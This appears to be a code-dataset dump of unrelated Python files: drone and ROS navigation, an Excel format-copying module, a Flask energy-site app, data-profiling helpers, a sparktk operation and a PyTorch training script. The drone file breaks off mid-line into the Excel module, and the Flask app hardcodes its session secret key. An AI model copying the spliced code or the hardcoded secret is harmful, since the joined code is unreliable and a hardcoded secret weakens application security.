the drone\n\n def set_cam_coord(self,X,Y,Z):\n ''' function which set the position atributes of the drone'''\n self.cam_X=X\n self.cam_Y=Y\n self.cam_Z=Z\n\n def set_previous_coord(self,X,Y,Z):\n ''' function which set the position previous atributes of the drone'''\n self.previous_X=X \n self.previous_Y=Y\n self.previous_Z=Z\n\n def get_vitesse_X_Y_Z(self):\n ''' function which return the velocity of the drone'''\n return[(self.cam_X-self.previous_X)/0.02,(self.cam_Y-self.previous_Y)/0.02,(self.cam_Z-self.previous_Z)/0.02]\n\n def get_Cam_X_Y_Z(self):\n ''' function which return the position of the drone'''\n return [self.cam_X,self.cam_Y,self.cam_Z]\n \n def calcul_distance(self,x,y):\n ''' function which return the distance between the drone and the object'''\n return abs(self.cam_X-x)+abs(self.cam_Y-y)\n \n def objectif(self):\n ''' function which return the objectif of the drone depending of the value of i and if too far, launch the calcul\n of the new_temporary objectif'''\n if abs(self.cam_X-self.curent_obj[0])+abs(self.cam_Y-self.curent_obj[1])<0.15:\n if self.i==0:\n self.curent_obj=[0,1]\n self.i=1\n else:\n self.curent_obj=[0,-1]\n self.i=0\n else:\n self.new_calcul_obstacle([self.curent_obj[0],self.curent_obj[1],1])\n \n def force_objectif(self,position_obj):\n '''calcul the force of the objectif'''\n K=self.K_objectif\n norme=((self.cam_X-position_obj[0])**2+(self.cam_Y-position_obj[1])**2)**(1/2)\n u=[(self.cam_X-position_obj[0])/norme, (self.cam_Y-position_obj[1])/norme]\n return [-u[0]*K,-u[1]*K]\n\n\n def calcul_force_repulsion(self,position_ob,urgence,distance,K):\n '''calcul the force of the repulsion of obstacles'''\n norme=((self.cam_X-position_ob[0])**2+(self.cam_Y-position_ob[1])**2)**(1/2)\n u=[(self.cam_X-position_ob[0])/norme, (self.cam_Y-position_ob[1])/norme]\n return [u[0]*K*(urgence/distance)**2,u[1]*K*(urgence/distance)**2]\n\n\n def new_calcul_obstacle(self,objectif):\n ''' function which calculate the new movement of the drone'''\n force=self.force_objectif([objectif[0],objectif[1]])\n distance_unit=self.disance_unit\n urgence =self.urgence\n K_urgence=self.K_urgence\n voisin_urgence=[]\n for voisin in self.voisin:\n d=self.calcul_distance(voisin[0],voisin[1])\n if d 0:\n time.sleep(n_seconds_to_sleep)\n\n\n # シート名並び順を指定することも可能\n if sorted_sheet_names_list is None:\n sorted_sheet_names_list = sheet_names_list\n\n # 一時的excel格納ディレクトリを中身ごと削除\n if del_tmp_dir:\n shutil.rmtree(tmp_output_excel_dir_path)\n\n\n # シートの整理\n # シートを一旦ロードする\n output_wb = px.load_workbook(output_excel_path)\n\n # シートを並び替える\n n_sheets = len(output_wb.sheetnames)\n for tmp_sheet_name in sorted_sheet_names_list:\n output_wb.move_sheet(output_wb[tmp_sheet_name], offset=n_sheets)\n\n # デフォルトで作成される不要な1つ目のシートを削除する\n output_wb.remove(output_wb.worksheets[0])\n\n # 保存\n output_wb.save(output_excel_path)\n\n\ndef copy_excel_format_parallel(\n ceih_list,\n output_excel_path,\n tmp_output_excel_dir_path='./tmp_output_excel/',\n parallel_method='joblib_multithreads',\n n_jobs=1,\n copy_sheet_method='xlwings',\n sorted_sheet_names_list=None,\n del_tmp_dir=True,\n n_seconds_to_sleep=0,\n cef_manual_set_rows=None,\n cef_force_dimension_copy=False,\n cef_debug_mode=False,\n write_index=False,\n write_header=True,\n copy_values=False\n ):\n \"\"\"\n 並列処理を行い, 一時的な書式設定済みのexcelファイルを出力する.\n 一時的に出力した複数のexcelファイルをまとめて複数シートを持つ1つのexcelファイルとする.\n\n Args:\n ceih_list: list of CopyExcelInfoHolder object\n list of CopyExcelInfoHolder object\n \n output_excel_path: str\n output excel file path\n \n tmp_output_excel_dir_path: str, optional(default='./tmp_output_excel/')\n temporary output excel file path\n \n parallel_method: str, optional(default='joblib_multithreads')\n 'joblib_multithreads' or 'multiprocess'\n parallel method\n \n n_jobs: int, optional(default=1)\n number of workers\n \n copy_sheet_method: str, optional(default='xlwings')\n xlwings or win32com\n \n sorted_sheet_names_list: list of str\n sorted sheet names\n \n del_tmp_dir: bool, optional(default=True)\n delete temporary directory\n \n n_seconds_to_sleep: float, optional(default=True)\n Number of seconds to sleep for low spec PCs.\n \n cef_manual_set_rows: list of int[min_row, max_row] or None, optional(default=None)\n 書式コピーを行う行数をマニュアルで指定する.\n\n cef_force_dimension_copy: bool, optional(default=False)\n 強制的に行と列の幅などをコピー, 反映させる.\n\n cef_debug_mode: bool, optional(default=False)\n デバッグモード.\n \n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n\n # 並列処理を行い, 一時的な書式設定済みのexcelファイルを出力する.\n output_temporary_excel_parallel(\n ceih_list = ceih_list,\n tmp_output_excel_dir_path = tmp_output_excel_dir_path,\n parallel_method = parallel_method,\n n_jobs = n_jobs,\n cef_manual_set_rows = cef_manual_set_rows,\n cef_force_dimension_copy = cef_force_dimension_copy,\n cef_debug_mode = cef_debug_mode,\n write_index = write_index,\n write_header = write_header,\n copy_values = copy_values\n )\n \n # 一時的に出力した複数のexcelファイルをまとめて複数シートを持つ1つのexcelファイルとする.\n copy_excel_format_from_temporary_files(\n ceih_list = ceih_list,\n output_excel_path = output_excel_path,\n tmp_output_excel_dir_path = tmp_output_excel_dir_path,\n copy_sheet_method = copy_sheet_method,\n sorted_sheet_names_list = sorted_sheet_names_list,\n del_tmp_dir = del_tmp_dir,\n n_seconds_to_sleep = n_seconds_to_sleep\n )\n\n\n\n# --------------------------------------------------------------------------------\n# Classes\n# --------------------------------------------------------------------------------\n\n\n# CopyExcelInfoHolder\nclass CopyExcelInfoHolder():\n def __init__(\n self,\n template_excel_path,\n template_sheet_name,\n output_sheet_name,\n df\n ): \n self.template_excel_path = template_excel_path\n self.template_sheet_name = template_sheet_name\n self.output_sheet_name = output_sheet_name\n self.df = df\n\n\n# CopyExcelFormat\nclass CopyExcelFormat():\n \"\"\"\n Excel sheetにpandas.DataFrameを書式付きで書き込む.\n\n Attributes:\n input_ws: openpyxl.worksheet.worksheet.Worksheet\n 書式コピー元worksheetオブジェクト.\n \n output_ws: openpyxl.worksheet.worksheet.Worksheet\n コピー先worksheetオブジェクト.\n \n df: pandas.DataFrame\n 書き込むDataFrame.\n \n manual_set_rows: list of int[min_row, max_row] or None, optional(default=None)\n 書式コピーを行う行数をマニュアルで指定する.\n\n force_dimension_copy: bool, optional(default=False)\n 強制的に行と列の幅などをコピー, 反映させる.\n\n debug_mode: bool, optional(default=False)\n デバッグモード.\n \n Example:\n # CopyExcelFormatインスタンスの作成\n cef = CopyExcelFormat(\n input_ws = input_ws, # 書式コピー元wsオブジェクト(要修正)\n output_ws = output_ws,\n df = df,\n manual_set_rows = None,\n force_dimension_copy = False,\n debug_mode = False\n )\n\n # 書式書き込みの実行\n cef.write_df2formatted_sheet(\n write_index = False,\n write_header = False,\n copy_values = False\n )\n \"\"\"\n\n def __init__(\n self,\n input_ws=None,\n output_ws=None,\n df=None,\n manual_set_rows=None,\n force_dimension_copy=False,\n debug_mode=False\n ):\n \"\"\"\n CopyExcelFormatクラスのコンストラクタ.\n \"\"\"\n\n self.set_input_ws(input_ws)\n self.set_output_ws(output_ws)\n self.set_df(df)\n self.manual_set_rows = manual_set_rows\n self.force_dimension_copy = force_dimension_copy\n self.debug_mode = debug_mode\n\n if self.debug_mode:\n self.init_time = time.time()\n \n\n def set_input_ws(self, input_ws=None):\n self.input_ws = input_ws\n\n\n def set_output_ws(self, output_ws=None):\n self.output_ws = output_ws\n \n\n def set_df(self, df=None):\n \"\"\"\n pandas.DataFrameをセットする\n\n Args:\n df: pandas.DataFrame \n \"\"\"\n\n self.df = df\n \n if df is None:\n self.df_shape_list = None\n self.df_n_rows = None\n self.df_n_cols = None\n \n else:\n self.df_shape_list = list(df.shape)\n self.df_n_rows = self.df_shape_list[0]\n self.df_n_cols = self.df_shape_list[1]\n\n\n # private method\n def __copy_sheet_format(self, copy_values=False):\n \"\"\"\n Excel sheetの書式を条件付き含めてコピーし, 別のsheetに反映させる.\n \n Args: \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n \n if self.manual_set_rows is None:\n\n # 書式のコピー\n for row in self.input_ws.rows:\n for input_cell in row:\n\n # 値コピーする場合\n if copy_values:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column,\n value=input_cell.value\n )\n \n # 値コピーしない場合\n else:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column\n )\n\n # cellにスタイルが指定されていた場合\n if input_cell.has_style:\n output_cell.font = copy.copy(input_cell.font)\n output_cell.border = copy.copy(input_cell.border)\n output_cell.fill = copy.copy(input_cell.fill)\n output_cell.number_format = copy.copy(input_cell.number_format)\n output_cell.protection = copy.copy(input_cell.protection)\n output_cell.alignment = copy.copy(input_cell.alignment)\n\n del input_cell, output_cell\n gc.collect()\n \n elif type(self.manual_set_rows) == list:\n\n # 書式のコピー\n # manual_set_rows = [min_row, max_row]\n for row in self.input_ws.iter_rows(min_row=self.manual_set_rows[0], max_row=self.manual_set_rows[1]):\n for input_cell in row:\n\n # 値コピーする場合\n if copy_values:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column,\n value=input_cell.value\n )\n \n # 値コピーしない場合\n else:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column\n )\n\n # cellにスタイルが指定されていた場合\n if input_cell.has_style:\n output_cell.font = copy.copy(input_cell.font)\n output_cell.border = copy.copy(input_cell.border)\n output_cell.fill = copy.copy(input_cell.fill)\n output_cell.number_format = copy.copy(input_cell.number_format)\n output_cell.protection = copy.copy(input_cell.protection)\n output_cell.alignment = copy.copy(input_cell.alignment)\n\n del input_cell, output_cell\n gc.collect()\n\n else:\n print('error: manual set rows type error.')\n \n\n # 処理時間表示\n if self.debug_mode:\n print('to copy cell format end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n\n\n # 条件付き書式のコピー\n self.output_ws.conditional_formatting = copy.copy(self.input_ws.conditional_formatting)\n\n # その他諸々のコピー\n # self.output_ws.conditional_formatting = self.input_ws.conditional_formatting\n self.output_ws.page_margins = copy.copy(self.input_ws.page_margins)\n self.output_ws.page_setup = copy.copy(self.input_ws.page_setup)\n self.output_ws.col_breaks = copy.copy(self.input_ws.col_breaks)\n self.output_ws.row_breaks = copy.copy(self.input_ws.row_breaks)\n self.output_ws.sheet_format = copy.copy(self.input_ws.sheet_format)\n self.output_ws.sheet_properties = copy.copy(self.input_ws.sheet_properties)\n self.output_ws._print_area = copy.copy(self.input_ws._print_area)\n self.output_ws.views = copy.copy(self.input_ws.views)\n\n # セル結合状態をコピー, 反映させる.\n for cell_range in self.input_ws.merged_cells.ranges:\n self.output_ws.merge_cells(range_string=cell_range.coord)\n\n # 強制的に行と列の幅をコピー, 反映させる.\n if self.force_dimension_copy:\n\n # 列の幅と表示非表示をコピー\n for col_idx in range(self.input_ws.max_column):\n col_name = get_column_letter(col_idx + 1)\n\n # 列の幅\n self.output_ws.column_dimensions[col_name].width = copy.copy(self.input_ws.column_dimensions[col_name].width)\n\n # 表示非表示\n self.output_ws.column_dimensions[col_name].hidden = copy.copy(self.input_ws.column_dimensions[col_name].hidden)\n\n # 行の高さと表示非表示をコピー\n for row_idx in range(self.input_ws.max_row):\n row_name = row_idx + 1\n\n # 行の高さ\n self.output_ws.row_dimensions[row_name].height = copy.copy(self.input_ws.row_dimensions[row_name].height)\n\n # 表示非表示\n self.output_ws.row_dimensions[row_name].hidden = copy.copy(self.input_ws.row_dimensions[row_name].hidden)\n \n else:\n\n # 列の幅と表示非表示をコピー\n for col_name, col_obj in self.input_ws.column_dimensions.items():\n\n # 列の幅\n self.output_ws.column_dimensions[col_name].width = copy.copy(col_obj.width)\n\n # 表示非表示\n self.output_ws.column_dimensions[col_name].hidden = copy.copy(col_obj.hidden)\n\n # 行の高さと表示非表示をコピー\n for row_name, row_obj in self.input_ws.row_dimensions.items():\n\n # 行の高さ\n self.output_ws.row_dimensions[row_name].height = copy.copy(row_obj.height)\n\n # 表示非表示\n self.output_ws.row_dimensions[row_name].hidden = copy.copy(row_obj.hidden)\n\n \n # private method\n def __write_df2sheet(self, write_index=False, write_header=False):\n \"\"\"\n Excel sheetにpandas.DataFrameを書き込む.\n \n Args:\n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \"\"\"\n \n # DataFrameを1行ずつ書き込む.\n for df_row in dataframe_to_rows(self.df, index=write_index, header=write_header):\n self.output_ws.append(df_row)\n \n\n def write_df2formatted_sheet(self, write_index=False, write_header=True, copy_values=False):\n \"\"\"\n Excel sheetにpandas.DataFrameを書式付きで書き込む.\n\n Args: \n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n\n if self.debug_mode:\n self.wd2fs_start_time = time.time()\n\n print('*' * 80)\n print('sheet name: {}'.format(str(self.output_ws.title)))\n print()\n\n # DataFrameの書き込み\n try:\n\n # DataFrameの書き込み\n self.__write_df2sheet(\n write_index = write_index,\n write_header = write_header\n )\n\n except Exception as e:\n print('error: write df to sheet.')\n print(e)\n\n # 処理時間表示\n if self.debug_mode:\n print('to write df to sheet end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n\n # 書式のコピー \n try:\n \n # 書式のコピー\n self.__copy_sheet_format(\n copy_values = copy_values\n )\n\n except Exception as e:\n print('error: copy sheet format.')\n print(e)\n \n # 処理時間表示\n if self.debug_mode:\n print('to copy format end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n print('*' * 80)\n print()\n\n\n\n \n\n\n\n","repo_name":"laplaciannin102/copy_excel_format","sub_path":"copy_excel_format/excel_module.py","file_name":"excel_module.py","file_ext":"py","file_size_in_byte":35204,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23173950525","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import LaserScan\nimport math\n\nclass Bug0:\n def __init__(self):\n rospy.init_node('bug0')\n rospy.Subscriber('/scan', LaserScan, self.scan_callback)\n rospy.Subscriber('/odom', Odometry, self.odom_callback)\n self.pub = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\n self.rate = rospy.Rate(10) # Hz\n self.dist_tol = 0.1 # m\n self.angle_tol = math.pi/30 # radians\n self.goal = None\n self.obstacle = None\n self.odom = None\n self.cmd_vel = Twist()\n rospy.spin()\n\n def odom_callback(self, msg):\n self.odom = msg.pose.pose\n\n def scan_callback(self, msg):\n min_range = msg.range_max\n min_angle = None\n for i, r in enumerate(msg.ranges):\n if r < min_range:\n min_range = r\n min_angle = msg.angle_min + i * msg.angle_increment\n self.obstacle = (min_range, min_angle)\n\n def set_goal(self, x, y):\n self.goal = (x, y)\n self.cmd_vel.linear.x = 0.5\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n self.rate.sleep()\n\n\n def bug0(self):\n while not rospy.is_shutdown():\n if self.goal is None or self.odom is None or self.obstacle is None:\n self.rate.sleep()\n continue\n dist = math.sqrt((self.goal[0]-self.odom.position.x)**2 + (self.goal[1]-self.odom.position.y)**2)\n if dist < self.dist_tol:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n break\n if self.obstacle[0] > dist:\n angle_to_goal = math.atan2(self.goal[1]-self.odom.position.y, self.goal[0]-self.odom.position.x)\n angle_diff = angle_to_goal - math.atan2(self.odom.orientation.y, self.odom.orientation.x)\n if angle_diff > math.pi:\n angle_diff -= 2*math.pi\n elif angle_diff < -math.pi:\n angle_diff += 2*math.pi\n if abs(angle_diff) > self.angle_tol:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = angle_diff\n self.pub.publish(self.cmd_vel)\n else:\n self.cmd_vel.linear.x = 0.5\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n else:\n angle_to_obstacle = self.obstacle[1]\n if abs(angle_to_obstacle) < math.pi/2:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = -0.5\n else:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = 0.5\n self.pub.publish(self.cmd_vel)\n self.rate.sleep()\n\n def run(self):\n while not rospy.is_shutdown():\n self.bug0()\n self.rate.sleep()\n\nif __name__ == '__main__':\n try:\n bug0_node = Bug0()\n bug0_node.run()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"jorge-vh/McQueen","sub_path":"src/puzzlebot_sim/src/WEEK1-4/chatgpt.py","file_name":"chatgpt.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34821516021","text":"import json\r\n\r\nfrom controller import ConfigurationControl, SitesControll, LiveDataControl\r\n\r\nfrom flask import Flask, session, redirect, url_for, request, render_template\r\nfrom markupsafe import escape\r\n\r\ndata = Flask(__name__)\r\ndata.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\r\nCHECKBOX_MAPPING = {'on': True,\r\n 'off': False}\r\n\r\n\r\n@data.route('/', methods=[\"GET\"])\r\ndef index():\r\n return render_template(\"first.html\")\r\n\r\n\r\n@data.route('/site/create', methods=[\"GET\", \"POST\"])\r\ndef create_site():\r\n \"\"\"\r\n\r\n :return: new site\r\n \"\"\"\r\n if request.method == 'POST':\r\n SitesControll.create_site(request.form[\"site_name\"], request.form[\"site_location\"])\r\n return render_template(\"new_site.html\")\r\n\r\n\r\n@data.route('/conf//create', methods=[\"GET\", \"POST\"])\r\ndef create_conf(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: new configuration\r\n \"\"\"\r\n if request.method == 'POST':\r\n battery = {\"vendor\": request.form[\"battery_vendor\"],\r\n \"capacity_kwh\": request.form[\"battery_capacity_kwh\"],\r\n \"max_power_kw\": request.form[\"battery_max_power_kw\"]\r\n }\r\n production = {\r\n \"pv\": {\"units\": request.form[\"pv_units\"], \"kwp\": request.form[\"pv_kwp\"]},\r\n \"bio\": {\"units\": request.form[\"bio_units\"]},\r\n \"cro\": {\"units\": request.form[\"cro_units\"], \"kwp\": request.form[\"cro_kwp\"]}\r\n }\r\n ConfigurationControl.create_new(site_id, battery, production)\r\n return render_template(\"new_conf.html\")\r\n\r\n\r\n@data.route('/live_data//create', methods=[\"GET\", \"POST\"])\r\ndef create_live_data(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: new live data\r\n \"\"\"\r\n if request.method == 'POST':\r\n LiveDataControl.create_live_data(site_id, int(request.form[\"soc\"]),\r\n int(request.form[\"load_kwh\"]),\r\n int(request.form[\"net_load_kwh\"]),\r\n \"pv_notification\" in request.form,\r\n \"bio_notification\" in request.form,\r\n \"cro_notification\" in request.form)\r\n\r\n return render_template(\"live_data.html\")\r\n\r\n\r\n@data.route('/sites', methods=[\"GET\"])\r\ndef get_sites():\r\n \"\"\"\r\n\r\n :return: all sites in data base\r\n \"\"\"\r\n header = '''\r\n\r\n the sites List\r\n '''\r\n\r\n body = \"\"\r\n for i in SitesControll.get_all(): # move all list\r\n body += \"

\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"

\"\r\n\r\n return header + body\r\n\r\n\r\n@data.route('/conf', methods=[\"GET\"])\r\ndef get_configurations():\r\n \"\"\"\r\n\r\n :return: return all conf in data base\r\n \"\"\"\r\n heder = '''\r\n\r\n the configurations List\r\n '''\r\n\r\n body = \"\"\r\n for i in ConfigurationControl.get_all(): # move all list\r\n body += \"

\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"

\"\r\n\r\n return heder + body\r\n\r\n\r\n@data.route('/live_data', methods=[\"GET\"])\r\ndef get_live_data():\r\n \"\"\"\r\n\r\n :return: return all live data\r\n \"\"\"\r\n header = '''\r\n\r\n live_data List\r\n '''\r\n\r\n body = \"\"\r\n for i in LiveDataControl.get_all_live_data(): # move all list\r\n body += \"

\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"

\"\r\n\r\n return header + body\r\n\r\n\r\n@data.route('/conf//edit', methods=['GET', \"POST\"])\r\ndef edit_conf(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id: \r\n :return: edit configuration\r\n \"\"\"\r\n\r\n if request.method == 'POST':\r\n if request.form['submit'] == 'save':\r\n battery = {\"vendor\": request.form[\"battery_vendor\"],\r\n \"capacity_kwh\": request.form[\"battery_capacity_kwh\"],\r\n \"max_power_kw\": request.form[\"battery_max_power_kw\"]\r\n }\r\n production = {\r\n \"pv\": {\"units\": request.form[\"pv_units\"], \"kwp\": request.form[\"pv_kwp\"]},\r\n \"bio\": {\"units\": request.form[\"bio_units\"]},\r\n \"cro\": {\"units\": request.form[\"cro_units\"], \"kwp\": request.form[\"cro_kwp\"]}\r\n }\r\n ConfigurationControl.edit_conf(site_id, battery, production)\r\n conf = ConfigurationControl.get_by_id(site_id)\r\n return render_template(\"edit_conf.html\", conf=conf[0])\r\n if request.method == 'GET':\r\n conf = ConfigurationControl.get_by_id(site_id)\r\n if conf:\r\n print(conf)\r\n return render_template(\"edit_conf.html\", conf=conf[0])\r\n else:\r\n return 'Error loading #{id}'.format(id=site_id)\r\n\r\n\r\n@data.route('/live_data//edit', methods=['GET', \"POST\"])\r\ndef edit_live_data(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: edit live data\r\n \"\"\"\r\n print(site_id)\r\n if request.method == 'POST':\r\n if request.form['submit'] == 'save':\r\n LiveDataControl.edit_live_data(site_id, int(request.form[\"soc\"]),\r\n int(request.form[\"load_kwh\"]),\r\n int(request.form[\"net_load_kwh\"]),\r\n \"pv_notification\" in request.form,\r\n \"bio_notification\" in request.form,\r\n \"cro_notification\" in request.form)\r\n return render_template(\"edit_live_data.html\")\r\n if request.method == 'GET':\r\n return render_template(\"edit_live_data.html\")\r\n","repo_name":"kerenor557100/AGEERA_K-_Or","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":5557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27027278741","text":"# Import libraries:\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass Data:\n # function to clean te dataset:\n def profile(df):\n\n \"\"\"\n Param df is dataframe\n Function checks for NaNs, print them, and print the description.\n \"\"\"\n nans = df.isnull().sum()\n nans = pd.DataFrame(nans, columns=['NaNs'])\n\n # Check and print missing values:\n print('Missing Values :', '\\n', nans)\n\n # Describe dataset:\n\n print('\\n')\n print('Describe dataset :', '\\n', df.describe().T)\n\n def split(df):\n # Make the train/test split:\n \"\"\"\n Param df is dataframe.\n Function split the dataframe into train, validation and test.\n \"\"\"\n train, test = train_test_split(\n df, train_size=0.8,\n test_size=0.2,\n random_state=42\n )\n train, validation = train_test_split(\n train, train_size=0.8,\n test_size=0.2,\n random_state=42\n )\n print('\\n')\n print('Train shape : ', train.shape)\n print('Validation shape: ', validation.shape)\n print('Test shape : ', test.shape)","repo_name":"medamer/lambdata-medamer","sub_path":"my_lambdata/my_mod.py","file_name":"my_mod.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17899245315","text":"from sparktk.frame.pyframe import PythonFrame\nfrom sparktk.frame.schema import get_indices_for_selected_columns\n\n\ndef drop_columns(self, columns):\n \"\"\"\n Drops columns from the frame\n\n Parameters\n ----------\n\n :param columns: (str or List[str]) names of the columns to drop\n\n Examples\n --------\n\n For this example, the Frame object *my_frame* accesses a frame with 4 columns\n columns *column_a*, *column_b*, *column_c* and *column_d* and drops 2 columns *column_b* and *column_d* using drop columns.\n\n\n \n >>> sc=[(\"column_a\", str), (\"column_b\", int), (\"column_c\", str), (\"column_d\", int)]\n >>> rows = [[\"Alameda\", 1, \"CA\", 7], [\"Princeton\", 2, \"NJ\", 6], [\"NewYork\", 3 , \"NY\", 9]]\n >>> frame = tc.frame.create(rows, sc)\n -etc-\n\n \n\n >>> print frame.schema\n [('column_a', ), ('column_b', ), ('column_c', ), ('column_d', )]\n\n\n Eliminate columns *column_b* and *column_d*:\n\n >>> frame.drop_columns([\"column_b\", \"column_d\"])\n >>> print frame.schema\n [('column_a', ), ('column_c', )]\n\n Now the frame only has the columns *column_a* and *column_c*.\n For further examples, see: ref:`example_frame.drop_columns`.\n\n \"\"\"\n if isinstance(columns, basestring):\n columns = [columns]\n if self._is_scala:\n self._scala.dropColumns(self._tc.jutils.convert.to_scala_vector_string(columns))\n else:\n victim_indices = get_indices_for_selected_columns(self.schema, columns)\n survivor_indices = [i for i in xrange(len(self.schema)) if i not in victim_indices]\n filtered_schema = [self.schema[i] for i in survivor_indices]\n\n def filter_fields(row):\n return [row[i] for i in survivor_indices]\n filtered_rdd = self.rdd.map(filter_fields)\n self._frame = PythonFrame(filtered_rdd, filtered_schema)\n","repo_name":"tapanalyticstoolkit/spark-tk","sub_path":"python/sparktk/frame/ops/drop_columns.py","file_name":"drop_columns.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"29414570286","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nfrom model import ImageNet\nfrom argparser import get_args\nfrom dataloader import Food11Dataset#, ImgAugTransform\n\ndef forward(name, dataloader, model, lossfunction = None, optimizer = None) :\n\n\tavgcorrect = [0.0] * 11\n\tcases = [0.0] * 11\n\n\tfor i, (inputs_cpu, labels_cpu) in enumerate(dataloader):\n\t\t# initialize\n\t\ttorch.cuda.empty_cache()\n\t\tif optimizer :\n\t\t\toptimizer.zero_grad()\n\t\t# forward\n\t\tinputs = inputs_cpu.half().cuda()\n\t\toutputs = model(inputs)\n\t\tdel inputs, inputs_cpu\n\n\t\t# loss and step\n\t\tlabels = labels_cpu.cuda()\n\t\tdel labels_cpu\n\t\tif lossfunction :\n\t\t\tloss = lossfunction(outputs, labels)\n\t\t\tloss.backward()\n\t\t\tdel loss\n\t\tif optimizer :\n\t\t\toptimizer.step()\n\t\t\n\t\t# convert to prediction\n\t\ttmp, pred = outputs.max(1)\n\t\tdel tmp, outputs\n\t\t\n\t\t# calculate accuracy\n\t\tfor i in range(len(pred)) :\n\t\t\tif pred[i] == labels[i] :\n\t\t\t\tavgcorrect[labels[i]] += 1\n\t\t\tcases[labels[i]] += 1\n\t\tdel labels, pred\n\n\t# print result\n\tavg = 0.0\n\tprint('\\t%s :'%name, '%.2f%%'%(sum(avgcorrect) / sum(cases) * 100))\n\tfor i in range(11) :\n\t\tprint('\\t\\tclass', '%2d'%i, '%5d'%cases[i], '%5.2f%%'%(avgcorrect[i] / cases[i] * 100))\n\t\tavg += avgcorrect[i] / cases[i]\n\n\tprint('\\t\\tPer-class %5.2f%%'%(avg * 100 / 11))\n\t# return accuracy\n\treturn avg\n\nif __name__ == '__main__' :\n\n\targs = get_args()\n\n\ttransform_train = transforms.Compose([\n\t\ttransforms.Resize((256, 256)),\n\t\t# ImgAugTransform(),\n\t transforms.ToTensor(),\n\t transforms.Normalize([0.4965, 0.3980, 0.3058], [0.3071, 0.2927, 0.2835]),\n\t])\n\n\ttransform_test = transforms.Compose([\n\t\ttransforms.Resize((256, 256)),\n\t transforms.ToTensor(),\n\t transforms.Normalize([0.4965, 0.3980, 0.3058], [0.3071, 0.2927, 0.2835]),\n\t])\n\n\tweights = torch.Tensor([len(os.listdir('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\skewed_training\\\\' + str(i) + '\\\\')) for i in range(11)])\n\tcount = torch.Tensor([])\n\ttotal = sum(weights)\n\tfor i in range(11) :\n\t\tcount = torch.cat((count, torch.Tensor([total / weights[i] for s in range(int(weights[i]))])))\n\tsampler = torch.utils.data.sampler.WeightedRandomSampler(count, len(count))\n\n\ttrainset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\skewed_training\\\\', transform_train)\n\tvalidationset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\validation\\\\', transform_test)\n\ttestset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\evaluation\\\\', transform_test)\n\n\ttrainloader = torch.utils.data.DataLoader(trainset, batch_size = args['batch_size'], shuffle = False, num_workers = args['thread'], pin_memory = True, drop_last = True, sampler = sampler)\n\tvalidationloader = torch.utils.data.DataLoader(validationset, batch_size = 64, num_workers = args['thread'])\n\ttestloader = torch.utils.data.DataLoader(testset, batch_size = 64, num_workers = args['thread'])\n\n\tmodel = None\n\n\tif args['load'] :\n\t\tmodel = torch.load('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['load'])\n\telse :\n\t\tmodel = ImageNet().half().cuda()\n\n\tcriterion = nn.CrossEntropyLoss()\n\toptimizer = optim.SGD(model.parameters(), lr = args['learning_rate'], momentum = 0.9)\n\n\tprint('Training :')\n\n\tavgloss = 0.0\n\tavgcorrect = [0.0] * 11\n\tcases = [0.0] * 11\n\tlastaccuracy = 0\n\n\tmodel.eval()\n\twith torch.no_grad() 